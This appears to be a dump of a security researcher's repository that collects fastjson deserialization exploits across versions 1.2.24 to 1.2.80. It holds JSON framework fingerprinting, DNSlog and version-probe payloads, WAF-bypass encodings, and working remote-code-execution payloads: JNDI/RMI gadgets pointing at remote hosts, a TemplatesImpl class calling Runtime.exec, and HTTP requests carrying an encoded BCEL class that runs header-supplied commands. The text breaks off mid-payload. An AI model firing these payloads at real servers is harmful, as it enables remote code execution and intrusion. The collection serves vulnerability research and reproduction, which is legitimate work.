├── README.md ├── bypass └── bypass.md ├── fastjsonCheck ├── attachments │ ├── Pasted image 20221114152727.png │ ├── Pasted image 20221114152732.png │ ├── Pasted image 20221114152841.png │ ├── Pasted image 20221114153516.png │ ├── Pasted image 20221114153913.png │ ├── Pasted image 20221118102601.png │ ├── Pasted image 20221118153949.png │ ├── Pasted image 20221118153958.png │ ├── Pasted image 20221118171808.png │ ├── Pasted image 20221124153332.png │ ├── image-20230730134436335.png │ └── image-20230730134501843.png └── fastjsonCheck.md └── recurring.md /README.md: -------------------------------------------------------------------------------- 1 | # fastjson 全版本漏洞复现 2 | 3 | By. Whoopsunix 4 | 5 | # Why fastjson? 6 | 7 | fastjson复现简单、调用链多,很多时候反而更像是在看其他组件的序列化链,很适合拿来做java研究 8 | 9 | 所以起了个项目记录自己复现过的POC,顺便记录pom依赖,毕竟找环境还是挺麻烦的 10 | 11 | ~~后续poc 环境 分析文章在 github 同步 https://github.com/Whoopsunix/fastjson_study~~ 12 | 13 | 备份笔记的时候发现很多后面实测案例都丢掉了 分项目维护起来很麻烦 之后有更改都写到 [博客](https://whoopsunix.com/#/docs/components/cves/fastjson/README) 里去了 14 | 15 | # 环境 16 | 17 | [环境](https://github.com/Whoopsunix/PPPVULNS/tree/master/components/fastjsonDemo) 18 | 19 | # json检测 20 | 21 | 通过实战案例记录不断更新,如何区分不同的框架、dnslog探测、版本探测、利用链探测 22 | 23 | [fastjson check](fastjsonCheck/fastjsonCheck.md) 24 | 25 | # 全版本poc合集 26 | 27 | [1.2.24-1.2.80 poc](recurring.md) 28 | 29 | # bypass 30 | 31 | 绕过手段 32 | 33 | [bypass](bypass/bypass.md) 34 | 35 | # 其他利用 36 | 37 | 二次反序列化、原生反序列化相关在其他项目中 38 | 39 | # 感谢以下师傅的研究 40 | 41 | + 42 | + https://github.com/LeadroyaL/fastjson-blacklist fastjson黑白名单 43 | + https://github.com/safe6Sec/Fastjson 目前最全的poc合集 44 | + https://github.com/su18/hack-fastjson-1.2.80 1.2.80 POC 45 | + https://github.com/safe6Sec/ShiroAndFastJson 1.2.80 poc含环境 46 | + https://mp.weixin.qq.com/s/5mO1L5o8j_m6RYM6nO-pAA 版本区分 47 | + https://b1ue.cn/archives/506.html 浅蓝博客 48 | + https://github.com/knownsec/KCon/tree/master/2022 浅蓝kcon分享 49 | + https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/ 50 | 雨了个雨 低版本 bcel -------------------------------------------------------------------------------- /bypass/bypass.md: -------------------------------------------------------------------------------- 1 | ```java 2 | JSON.parse("{\"@type\":\"org.example.User\",\"username\":\"1\"}") 3 | 4 | &User { 5 | username: 1 6 | } 7 | ``` 8 | 9 | # WAF bypass 10 | 11 | demo 12 | 13 | ```json 14 | { 15 | "@type": "org.example.User", 16 | "username": "1" 17 | } 18 | ``` 19 | 20 | # 编码绕过 21 | 22 | fastjson 对 key,value 值会自动进行 hex 解码和 unicode解码 23 | 24 | hex 25 | 26 | ```json 27 | { 28 | "\x40\x74\x79\x70\x65": "\x6f\x72\x67\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x55\x73\x65\x72", 29 | "username": "1" 30 | } 31 | ``` 32 | 33 | unicode 34 | 35 | ```json 36 | { 37 | "@type": "\u006f\u0072\u0067\u002e\u0065\u0078\u0061\u006d\u0070\u006c\u0065\u002e\u0055\u0073\u0065\u0072", 38 | "username": "1" 39 | } 40 | 41 | { 42 | "\u0040\u0074\u0079\u0070\u0065": "\u006f\u0072\u0067\u002e\u0065\u0078\u0061\u006d\u0070\u006c\u0065\u002e\u0055\u0073\u0065\u0072", 43 | "username": "1" 44 | } 45 | ``` 46 | 47 | # 字符填充 48 | 49 | ```json 50 | { 51 | "@type": "org.example.User", 52 | "username": "1", 53 | "f": "a*20000" 54 | } 55 | ``` 56 | 57 | 二次反序列化 58 | 59 | $ref 60 | 61 | http://www.bmth666.cn/bmth_blog/2022/04/11/Fastjson%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/#%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0 62 | 63 | 编码 64 | 65 | https://blog.csdn.net/fmyyy1/article/details/121674546 66 | 67 | 绕过 WAF ,在部分中间件中,multipart 支持指定 Content-Transformer-Encoding 可以使用 Base64 或 quoted-printable (QP 编码) 68 | 来绕过 WAF 69 | 70 | 大量字符绕过 WAF 71 | 72 | ``` 73 | [11111111111111111111111111111111111,[11111111111111111111111111111111111... ,[11111111111111111111111111111111111... ,[11111111111111111111111111111111111... ,[11111111111111111111111111111111111... ,...,{'\x40\u0074\x79\u0070\x65':xjava.lang.AutoCloseable"... ]]]]] 74 | 75 | ``` 76 | 77 | 各种特性 78 | 79 | ``` 80 | ,new:[NaN,x'00',{,/*}*/'\x40\u0074\x79\u0070\x65':xjava.lang.AutoClosea ble" 81 | ``` 82 | 83 | -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221114152727.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221114152727.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221114152732.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221114152732.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221114152841.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221114152841.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221114153516.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221114153516.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221114153913.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221114153913.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221118102601.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221118102601.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221118153949.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221118153949.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221118153958.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221118153958.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221118171808.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221118171808.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221124153332.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221124153332.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/image-20230730134436335.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/image-20230730134436335.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/image-20230730134501843.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/image-20230730134501843.png -------------------------------------------------------------------------------- /fastjsonCheck/fastjsonCheck.md: -------------------------------------------------------------------------------- 1 | # json框架区分 2 | 3 | # json框架区分 4 | 5 | 给定正常对象 User 6 | 7 | ```java 8 | public class User { 9 | String username; 10 | int password; 11 | float id; 12 | } 13 | ``` 14 | 15 | 利用报错信息、回显信息来区分json框架最直接的方式是更改原json数据构造错误语法(比如删去 `"`) ,通过异常信息中的关键字识别。 16 | 17 | 这种方式需要的最重要的一个前置条件就是报错需要回显,且需要是json框架的报错。比如在实战中遇到一些做了统一错误处理的站点,原本用来判断 18 | jackson 的方式(添加字符破坏的方式),在参数处理时就已经触发Exception,这种情况其实是不好确定的。 19 | 20 | ## fstjson 21 | 22 | 1. 浮点精度不丢失 23 | 其他 json 解析库在解析json时都会丢失,但fastjson不会 24 | 25 | ```json 26 | { 27 | "username": "1234", 28 | "password": 1.111111111111111111111111111111111, 29 | "id": 1.1111111111111111111111111111111111111 30 | } 31 | ``` 32 | 33 | 2. 响应状态 34 | 如果是fastjson会对@type做出响应 35 | 36 | ```json 37 | { 38 | "@type": "whatever" 39 | } 40 | ``` 41 | 42 | 3. DNSLOG 43 | DNSLOG 这种方式可以无回显探测fastjson,是较为高效的一种方法,但不适用于不出网环境,具体探测方式在后文展开 44 | 45 | ```json 46 | { 47 | "x": { 48 | "@type": "java.net.InetSocketAddress"{ 49 | "address":, 50 | "val": "dnslog" 51 | }} 52 | } 53 | ``` 54 | 55 | ## jackson 56 | 57 | 1. 严格要求与bean对象对齐,可少不能多,因此添加多余kv 报错 58 | 59 | ```json 60 | { 61 | "username": "1234", 62 | "password": "123", 63 | "a": 1 64 | } 65 | ``` 66 | 67 | 2. 无法解析单引号 报错 68 | 69 | ```json 70 | { 71 | 'username': '1234', 72 | 'password': '123' 73 | } 74 | ``` 75 | 76 | 3. 无法识别注释符 报错 77 | 78 | ```json 79 | { 80 | "username": "1234", 81 | "password": "123" 82 | }/**/ 83 | ``` 84 | 85 | ## gson 86 | 87 | 1. 浮点无法转整数 报错 88 | 向 int 类型的值传浮点数无法解析会报错 NumberFormatException 89 | 90 | ```json 91 | { 92 | "username": "1234", 93 | "password": 1.111111111111111111111111111111111, 94 | "id": 1 95 | } 96 | ``` 97 | 98 | 2. 特有解析 99 | org.json 与 gson 在遇到 # 时都会当注释符处理,可以用来识别这两个框架 100 | 101 | ```json 102 | #\n{"username": "1234", "password": 1, "id": 1.1} 103 | ``` 104 | 105 | 而gson 在不开启 `JsonReader.setLenient(true)` 的情况下(默认未开启),再拼接一个json字符串时会报错,可以用来区分这两个框架 106 | 107 | ```json 108 | #\n{a: 1}\n{\"username\":\"1234\",\"password\":1,\"id\":1.1} 109 | ``` 110 | 111 | ## org.json 112 | 113 | 1. 特有解析 114 | org.json 打印会调用 toString() 所以可以插入 `\n \r`等字符改变输出,如结合前面的 `#` 再加上 `\r` 115 | 116 | ```json 117 | #{"username": "\r"} 118 | ``` 119 | 120 | ## 举例实测案例 121 | 122 | ## fastjson 123 | 124 | 对于某正常登陆接口 125 | 126 | ![](attachments/Pasted%20image%2020221114152732.png) 127 | 128 | 添加多余key不报错,排除jackson 129 | 130 | ![](attachments/Pasted%20image%2020221114152841.png) 131 | 132 | 寻找另外一个整数值的接口改成浮点数,触发报错,但报错信息与gson预想不一致,还需要判断 133 | 134 | ![](attachments/Pasted%20image%2020221114153516.png) 135 | 136 | 拼接特有解析 `#\n{a:1}\n`,在排除gson的同时,通过报错信息得到组件为fastjson 1.2.83 137 | 138 | ![](attachments/Pasted%20image%2020221114153913.png) 139 | 140 | ## jackson 141 | 142 | ![](attachments/Pasted%20image%2020221118102601.png) 143 | 144 | # *Feign案例 145 | 146 | 存在一个接口可以解析一个 dnslog 的请求 147 | 148 | ![image-20230730134501843](attachments/image-20230730134501843.png) 149 | 150 | 但是如果是用 fastjson 可解析的不规范格式就会报错,报错字符中很明显的存在 jackson 字样 151 | 152 | ![image-20230730134436335](attachments/image-20230730134436335.png) 153 | 154 | 最后发现用了 Feign 库来做 json 转换,限定得使用标准 json 格式 155 | 156 | ```xml 157 | 158 | 159 | io.github.openfeign 160 | feign-jackson 161 | 12.4 162 | 163 | 164 | ``` 165 | 166 | # *ParseArray情况 167 | 168 | 需要注意的是如果使用 JSON.parseArray() 解析,需要 [] 包裹 payload 才不会报错。 169 | 170 | ```java 171 | String contents = "[{\"name\":\"whoopsunix\",\"age\":18}]"; 172 | JSON.parseArray(contents); 173 | ``` 174 | 175 | # dnslog 176 | 177 | 这里给出8条fastjson的调用链进行测试,如果存在fastjson框架则会收到 dns 请求,其中`java.net.URL` 在 1.2.24中不会解析 178 | 179 | ```bash 180 | {"1":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}} 181 | {"2":{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}} 182 | {"3":{"@type":"com.alibaba.fastjson.JSONObject",{"@type": "java.net.URL","val":"http://dnslog"}}""}} 183 | {"4":{"@type":"java.net.Inet4Address","val":"dnslog"}} 184 | {"5":{"@type":"java.net.Inet6Address","val":"dnslog"}} 185 | {"5":{"@type":"java.net.InetAddress","val":"dnslog"}} 186 | {"6":Set[{"@type":"java.net.URL","val":"http://dnslog"}]} 187 | {"7":{{"@type":"java.net.URL","val":"http://dnslog"}:0}} 188 | ``` 189 | 190 | 在 dnslog 域名被禁用的情况下,有回显也可以用一些正常域名测试是否存在DNS配置或出网 191 | 192 | ```json 193 | { 194 | "a": { 195 | "@type": "java.net.InetAddress", 196 | "val": "www.baidu.com" 197 | } 198 | } 199 | ``` 200 | 201 | # fastjson版本探测 202 | 203 | 需要注意的是部分系统是不支持 [] 形式包裹的,根据站点特性灵活改变写法 204 | 205 | ```json 206 | { 207 | "username": { 208 | "@type": "whatever" 209 | } 210 | } 211 | ``` 212 | 213 | ## 精确版本号1 214 | 215 | 有报错回显的情况下,返回精确版本号 216 | 217 | ```json 218 | { 219 | "@type": "java.lang.AutoCloseable" 220 | ``` 221 | 222 | ![](attachments/Pasted%20image%2020221118153949.png) 223 | 224 | ## 精确版本号2 225 | 226 | 对于存在 FastJsonHttpMessageConverter 配置的解析,通常指定了key值或json结构,可通过添加`[]`等方式破坏既定结构,实例: 227 | 228 | ```json 229 | [ 230 | { 231 | "@type": "whatever" 232 | } 233 | ] 234 | ``` 235 | 236 | ![](attachments/Pasted%20image%2020221124153332.png) 237 | 238 | ## dnslog 239 | 240 | 在没有回显的情况下,如果可以出网就要考虑dnslog了 241 | 242 | 前文提到1.2.24版本不会解析 `java.net.URL` 243 | ,而在之前的研究中,1.2.47、1.2.68、1.2.80是漏洞的三个里程碑版本,通过`java.lang.Class`、`java.lang.AutoCloseable`、`java.lang.Exception` 244 | 来构造dns请求可以准确识别 245 | 246 | payload向下兼容版本, 247 | 248 | ### 1.2.47 249 | 250 | ```json 251 | [ 252 | { 253 | "@type": "java.lang.Class", 254 | "val": "java.io.ByteArrayOutputStream" 255 | }, 256 | { 257 | "@type": "java.io.ByteArrayOutputStream" 258 | }, 259 | { 260 | "@type": "java.net.InetSocketAddress" 261 | { 262 | "address":, 263 | "val": "dnslog" 264 | } 265 | } 266 | ] 267 | ``` 268 | 269 | ### 1.2.68 270 | 271 | ```json 272 | [ 273 | { 274 | "@type": "java.lang.AutoCloseable", 275 | "@type": "java.io.ByteArrayOutputStream" 276 | }, 277 | { 278 | "@type": "java.io.ByteArrayOutputStream" 279 | }, 280 | { 281 | "@type": "java.net.InetSocketAddress" 282 | { 283 | "address":, 284 | "val": "dnslog" 285 | } 286 | } 287 | ] 288 | ``` 289 | 290 | ### 1.2.80 291 | 292 | 在68和80都只会接收到第一个dnslog请求,83会收到第二个请求 293 | 294 | ```json 295 | [ 296 | { 297 | "@type": "java.lang.Exception", 298 | "@type": "com.alibaba.fastjson.JSONException", 299 | "x": { 300 | "@type": "java.net.InetSocketAddress" 301 | { 302 | "address":, 303 | "val": "1.dnslog.cn" 304 | } 305 | } 306 | }, 307 | { 308 | "@type": "java.lang.Exception", 309 | "@type": "com.alibaba.fastjson.JSONException", 310 | "message": { 311 | "@type": "java.net.InetSocketAddress" 312 | { 313 | "address":, 314 | "val": "2.dnslog.cn" 315 | } 316 | } 317 | } 318 | ] 319 | ``` 320 | 321 | # 利用链探测 322 | 323 | ## Character 报错回显 324 | 325 | 探测到存在的类时将 Class 强转为 Char 导致报错回显 326 | 327 | ```json 328 | { 329 | "x": { 330 | "@type": "java.lang.Character"{ 331 | "@type": "java.lang.Class", 332 | "val": "com.fastjsoncheck.User" 333 | } 334 | } 335 | ``` 336 | 337 | ![](attachments/Pasted%20image%2020221118171808.png) 338 | 339 | ## Class回显 340 | 341 | 当类存在时将返回一个类实例 342 | 343 | ```json 344 | { 345 | "p": { 346 | "@type": "java.lang.Class", 347 | "val": "com.fastjsoncheck.User" 348 | } 349 | } 350 | ``` 351 | 352 | ## dnslog外带 353 | 354 | 该方式有限制,在mac环境下可以ping带 `{}` 的域名,Linux、win会报错 355 | 356 | ```json 357 | { 358 | "@type": "java.net.Inet4Address", 359 | "val": { 360 | "@type": "java.lang.String"{ 361 | "@type": "java.util.Locale", 362 | "val": { 363 | "@type": "com.alibaba.fastjson.JSONObject",{ 364 | "@type": "java.lang.String" 365 | "@type": "java.util.Locale", 366 | "country": "dnslog", 367 | "language": { 368 | "@type": "java.lang.String"{ 369 | "x": { 370 | "@type": "java.lang.Class", 371 | "val": "org.python.antlr.ParseException" 372 | } 373 | }} 374 | } 375 | } 376 | ``` -------------------------------------------------------------------------------- /recurring.md: -------------------------------------------------------------------------------- 1 | # fastjson全版本漏洞复现 2 | 3 | By. Whoopsunix 4 | 5 | # fastjson <=1.2.24 反序列化代码执行 6 | 7 | ## JdbcRowSetImpl 8 | 9 | ```json 10 | { 11 | "@type": "com.sun.rowset.JdbcRowSetImpl", 12 | "dataSourceName": "rmi://192.168.16.126:1099/whoopsunix", 13 | "autoCommit": true 14 | } 15 | ``` 16 | 17 | ## TemplatesImpl 18 | 19 | ```json 20 | { 21 | "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", 22 | "_bytecodes": ["base64 poc"], 23 | "_name": "Whoopsunix", 24 | "_tfactory": {}, 25 | "_outputProperties": {}, 26 | } 27 | ``` 28 | 29 | Exec.java 30 | ```java 31 | public class Exec extends AbstractTranslet { 32 | static { 33 | try { 34 | Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); 35 | } catch (Exception e){ 36 | 37 | } 38 | } 39 | 40 | @Override 41 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { 42 | 43 | } 44 | 45 | @Override 46 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { 47 | 48 | } 49 | } 50 | ``` 51 | 52 | ## bcel 53 | jdk8u251之后 bcel被移除 54 | ### tomcat-dbcp 55 | ```xml 56 | 57 | org.apache.tomcat 58 | tomcat-dbcp 59 | 7.0.47 60 | 61 | ``` 62 | 63 | ```http 64 | POST /test HTTP/1.1 65 | Host: 127.0.0.1:8080 66 | Content-Type: application/json 67 | cmd: whoami 68 | 69 | 70 | { 71 | { 72 | "@type": "com.alibaba.fastjson.JSONObject", 73 | "x":{ 74 | "@type": "org.apache.tomcat.dbcp.dbcp.BasicDataSource", 75 | "driverClassLoader": { 76 | "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" 77 | }, 78 | "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A" 79 | } 80 | }: "x" 81 | } 82 | ``` 83 | 84 | ```xml 85 | 86 | org.apache.tomcat 87 | tomcat-dbcp 88 | 8.5.42 89 | 90 | ``` 91 | 92 | ```json 93 | POST /test HTTP/1.1 94 | Host: 127.0.0.1:8080 95 | Content-Type: application/json 96 | cmd: whoami 97 | 98 | { 99 | { 100 | "@type": "com.alibaba.fastjson.JSONObject", 101 | "x":{ 102 | "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", 103 | "driverClassLoader": { 104 | "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" 105 | }, 106 | "driverClassName": "$$BCEL$$" 107 | } 108 | }: "x" 109 | } 110 | ``` 111 | 112 | ## spring 113 | ### PropertyPathFactoryBean 114 | ```xml 115 | 116 | org.springframework.boot 117 | spring-boot-starter 118 | 119 | ``` 120 | 121 | ```json 122 | { 123 | "@type": "org.springframework.beans.factory.config.PropertyPathFactoryBean", 124 | "targetBeanName": "rmi://192.168.1.2:1099/whoopsunix", 125 | "propertyPath": "whoopsunix", 126 | "beanFactory": { 127 | "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", 128 | "shareableResources": [ 129 | "rmi://192.168.1.2:1099/whoopsunix" 130 | ] 131 | } 132 | } 133 | ``` 134 | 135 | 136 | ### DefaultBeanFactoryPointcutAdvisor 137 | ```xml 138 | 139 | org.springframework.boot 140 | spring-boot-starter 141 | 142 | ``` 143 | 144 | ```json 145 | { 146 | "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor", 147 | "beanFactory": { 148 | "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", 149 | "shareableResources": [ 150 | "rmi://192.168.1.2:1099/whoopsunix" 151 | ] 152 | }, 153 | "adviceBeanName": "rmi://192.168.1.2:1099/whoopsunix" 154 | } 155 | ``` 156 | 157 | # fastjson 1.2.25-1.2.32 反序列化 158 | 来自雨了个雨师傅的研究,进行一下整合 159 | ## bcel 160 | ### ibatis 161 | ```xml 162 | 163 | org.mybatis 164 | mybatis 165 | 3.5.0 166 | 167 | ``` 168 | 169 | ```http 170 | POST /test HTTP/1.1 171 | Host: 127.0.0.1:8080 172 | Content-Type: application/json 173 | X-Token: whoami 174 | 175 | 176 | { 177 | "a":{ 178 | "@type":"java.lang.Class", 179 | "val":"com.sun.org.apache.bcel.internal.util.ClassLoader" 180 | }, 181 | "b":{ 182 | "@type":"java.lang.Class", 183 | "val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource" 184 | }, 185 | "c":{ 186 | "@type": "com.alibaba.fastjson.JSONObject", 187 | "name": { 188 | "@type": "java.lang.Class", 189 | "val": "org.apache.ibatis.datasource.unpooled.UnpooledDataSource" 190 | } 191 | }, 192 | "d":{ 193 | "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader", 194 | "e": { 195 | "f":{{ 196 | "@type": "com.alibaba.fastjson.JSONObject", 197 | "g": { 198 | "@type": "org.apache.ibatis.datasource.unpooled.UnpooledDataSource", 199 | "driverClassLoader": { 200 | "$ref": ".." 201 | }, 202 | 